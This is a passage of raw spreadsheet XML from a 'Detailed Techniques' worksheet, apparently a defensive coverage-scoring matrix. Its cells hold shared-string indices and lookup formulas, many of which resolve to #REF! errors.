    <row r="112" spans="1:25" ht="71.25" x14ac:dyDescent="0.45">
      <c r="A112" s="8" t="s">
        <v>129</v>
      </c>
      <c r="B112" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C112" s="8" t="s">
        <v>721</v>
      </c>
      <c r="D112" s="10" t="s">
        <v>722</v>
      </c>
      <c r="E112" s="10" t="s">
        <v>722</v>
      </c>
      <c r="F112" s="10" t="s">
        <v>723</v>
      </c>
      <c r="G112" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K112,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H112" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F112&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F112))-LEN(SUBSTITUTE(TRIM(F112),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I112" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F112&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F112))-LEN(SUBSTITUTE(TRIM(F112),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J112" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F112&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F112))-LEN(SUBSTITUTE(TRIM(F112),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K112" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L112" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F112&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F112))-LEN(SUBSTITUTE(TRIM(F112),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M112" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N112" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F112&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F112))-LEN(SUBSTITUTE(TRIM(F112),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O112" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P112" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F112&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F112))-LEN(SUBSTITUTE(TRIM(F112),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q112" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R112" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F112&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F112))-LEN(SUBSTITUTE(TRIM(F112),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S112" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T112" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F112&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F112))-LEN(SUBSTITUTE(TRIM(F112),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U112" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V112" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F112&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F112))-LEN(SUBSTITUTE(TRIM(F112),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W112" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X112" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F112&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F112))-LEN(SUBSTITUTE(TRIM(F112),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y112" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="113" spans="1:25" ht="313.5" x14ac:dyDescent="0.45">
      <c r="A113" s="8" t="s">
        <v>198</v>
      </c>
      <c r="B113" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C113" s="8" t="s">
        <v>724</v>
      </c>
      <c r="D113" s="10" t="s">
        <v>725</v>
      </c>
      <c r="E113" s="10" t="s">
        <v>726</v>
      </c>
      <c r="F113" s="10" t="s">
        <v>727</v>
      </c>
      <c r="G113" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K113,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H113" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F113&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F113))-LEN(SUBSTITUTE(TRIM(F113),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I113" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F113&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F113))-LEN(SUBSTITUTE(TRIM(F113),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J113" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F113&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F113))-LEN(SUBSTITUTE(TRIM(F113),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K113" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L113" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F113&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F113))-LEN(SUBSTITUTE(TRIM(F113),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M113" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N113" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F113&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F113))-LEN(SUBSTITUTE(TRIM(F113),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O113" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P113" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F113&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F113))-LEN(SUBSTITUTE(TRIM(F113),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q113" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R113" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F113&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F113))-LEN(SUBSTITUTE(TRIM(F113),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S113" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T113" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F113&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F113))-LEN(SUBSTITUTE(TRIM(F113),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U113" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V113" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F113&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F113))-LEN(SUBSTITUTE(TRIM(F113),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W113" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X113" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F113&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F113))-LEN(SUBSTITUTE(TRIM(F113),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y113" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="114" spans="1:25" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A114" s="8" t="s">
        <v>103</v>
      </c>
      <c r="B114" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C114" s="8" t="s">
        <v>728</v>
      </c>
      <c r="D114" s="10" t="s">
        <v>729</v>
      </c>
      <c r="E114" s="10" t="s">
        <v>730</v>
      </c>
      <c r="F114" s="10" t="s">
        <v>731</v>
      </c>
      <c r="G114" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K114,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H114" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F114&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F114))-LEN(SUBSTITUTE(TRIM(F114),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I114" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F114&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F114))-LEN(SUBSTITUTE(TRIM(F114),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J114" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F114&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F114))-LEN(SUBSTITUTE(TRIM(F114),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K114" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L114" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F114&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F114))-LEN(SUBSTITUTE(TRIM(F114),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M114" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N114" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F114&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F114))-LEN(SUBSTITUTE(TRIM(F114),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O114" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P114" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F114&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F114))-LEN(SUBSTITUTE(TRIM(F114),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q114" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R114" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F114&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F114))-LEN(SUBSTITUTE(TRIM(F114),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S114" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T114" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F114&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F114))-LEN(SUBSTITUTE(TRIM(F114),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U114" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V114" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F114&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F114))-LEN(SUBSTITUTE(TRIM(F114),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W114" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X114" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F114&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F114))-LEN(SUBSTITUTE(TRIM(F114),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y114" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="115" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A115" s="8" t="s">
        <v>86</v>
      </c>
      <c r="B115" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C115" s="8" t="s">
        <v>732</v>
      </c>
      <c r="D115" s="10" t="s">
        <v>733</v>
      </c>
      <c r="E115" s="10" t="s">
        <v>734</v>
      </c>
      <c r="F115" s="10" t="s">
        <v>735</v>
      </c>
      <c r="G115" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K115,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H115" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F115&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F115))-LEN(SUBSTITUTE(TRIM(F115),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I115" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F115&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F115))-LEN(SUBSTITUTE(TRIM(F115),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J115" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F115&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F115))-LEN(SUBSTITUTE(TRIM(F115),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K115" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L115" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F115&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F115))-LEN(SUBSTITUTE(TRIM(F115),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M115" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N115" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F115&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F115))-LEN(SUBSTITUTE(TRIM(F115),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O115" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P115" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F115&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F115))-LEN(SUBSTITUTE(TRIM(F115),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q115" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R115" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F115&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F115))-LEN(SUBSTITUTE(TRIM(F115),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S115" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T115" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F115&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F115))-LEN(SUBSTITUTE(TRIM(F115),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U115" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V115" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F115&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F115))-LEN(SUBSTITUTE(TRIM(F115),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W115" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X115" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F115&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F115))-LEN(SUBSTITUTE(TRIM(F115),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y115" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="116" spans="1:25" ht="71.25" x14ac:dyDescent="0.45">
      <c r="A116" s="8" t="s">
        <v>36</v>
      </c>
      <c r="B116" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C116" s="8" t="s">
        <v>736</v>
      </c>
      <c r="D116" s="10" t="s">
        <v>737</v>
      </c>
      <c r="E116" s="10" t="s">
        <v>738</v>
      </c>
      <c r="F116" s="10" t="s">
        <v>739</v>
      </c>
      <c r="G116" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K116,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H116" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F116&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F116))-LEN(SUBSTITUTE(TRIM(F116),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I116" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F116&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F116))-LEN(SUBSTITUTE(TRIM(F116),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J116" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F116&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F116))-LEN(SUBSTITUTE(TRIM(F116),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K116" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L116" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F116&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F116))-LEN(SUBSTITUTE(TRIM(F116),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M116" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N116" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F116&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F116))-LEN(SUBSTITUTE(TRIM(F116),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O116" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P116" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F116&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F116))-LEN(SUBSTITUTE(TRIM(F116),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q116" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R116" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F116&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F116))-LEN(SUBSTITUTE(TRIM(F116),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S116" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T116" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F116&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F116))-LEN(SUBSTITUTE(TRIM(F116),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U116" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V116" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F116&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F116))-LEN(SUBSTITUTE(TRIM(F116),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W116" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X116" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F116&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F116))-LEN(SUBSTITUTE(TRIM(F116),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y116" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="117" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A117" s="8" t="s">
        <v>50</v>
      </c>
      <c r="B117" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C117" s="8" t="s">
        <v>740</v>
      </c>
      <c r="D117" s="10" t="s">
        <v>741</v>
      </c>
      <c r="E117" s="10" t="s">
        <v>742</v>
      </c>
      <c r="F117" s="10" t="s">
        <v>472</v>
      </c>
      <c r="G117" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K117,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H117" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F117&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F117))-LEN(SUBSTITUTE(TRIM(F117),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I117" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F117&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F117))-LEN(SUBSTITUTE(TRIM(F117),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J117" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F117&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F117))-LEN(SUBSTITUTE(TRIM(F117),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K117" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L117" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F117&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F117))-LEN(SUBSTITUTE(TRIM(F117),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M117" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N117" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F117&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F117))-LEN(SUBSTITUTE(TRIM(F117),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O117" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P117" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F117&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F117))-LEN(SUBSTITUTE(TRIM(F117),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q117" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R117" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F117&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F117))-LEN(SUBSTITUTE(TRIM(F117),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S117" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T117" s="20" t="e">
